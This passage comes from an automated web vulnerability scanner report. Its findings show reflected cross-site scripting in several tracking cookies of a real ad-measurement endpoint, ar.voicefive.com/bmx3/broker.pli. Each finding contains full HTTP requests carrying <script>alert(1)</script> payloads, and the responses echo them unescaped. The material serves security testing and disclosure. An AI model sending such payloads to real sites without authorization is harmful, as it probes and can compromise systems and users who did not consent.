Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810af4ab<script>alert(1)</script>13f76ccbb09

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:40 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650520; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
917&', "ar_p84053757": 'exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&', "ar_s_p84053757": '1->1297606675', "UID": '1d29d89e-72.246.30.75-1294456810af4ab<script>alert(1)</script>13f76ccbb09', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:
...[SNIP]...

1.487. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_da39f516a098b3de) ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 8ac4a<script>alert(1)</script>5e82bcbd69f was submitted in the ar_da39f516a098b3de) ar_p68511049 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&8ac4a<script>alert(1)</script>5e82bcbd69f; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
ecExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&8ac4a<script>alert(1)</script>5e82bcbd69f' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

1.488. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload ecf8e<script>alert(1)</script>a7ed8ad7ab7 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&ecf8e<script>alert(1)</script>a7ed8ad7ab7; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
t Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&ecf8e<script>alert(1)</script>a7ed8ad7ab7', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:0
...[SNIP]...

1.489. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 5576b<script>alert(1)</script>42a950a151e was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&5576b<script>alert(1)</script>42a950a151e; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
"ar_s_p84053757": '1->1297606675', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&5576b<script>alert(1)</script>42a950a151e', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:
...[SNIP]...

1.490. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 8cbf1<script>alert(1)</script>5e54f48ca7b was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&8cbf1<script>alert(1)</script>5e54f48ca7b; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&8cbf1<script>alert(1)</script>5e54f48ca7b', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&
...[SNIP]...

1.491. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p84053757 cookie is copied into the HTML document as plain text between tags. The payload 64e2e<script>alert(1)</script>5bd065759a6 was submitted in the ar_p84053757 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&64e2e<script>alert(1)</script>5bd065759a6; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:40 GMT
Content-Type: application/x-javascript
Connection: close
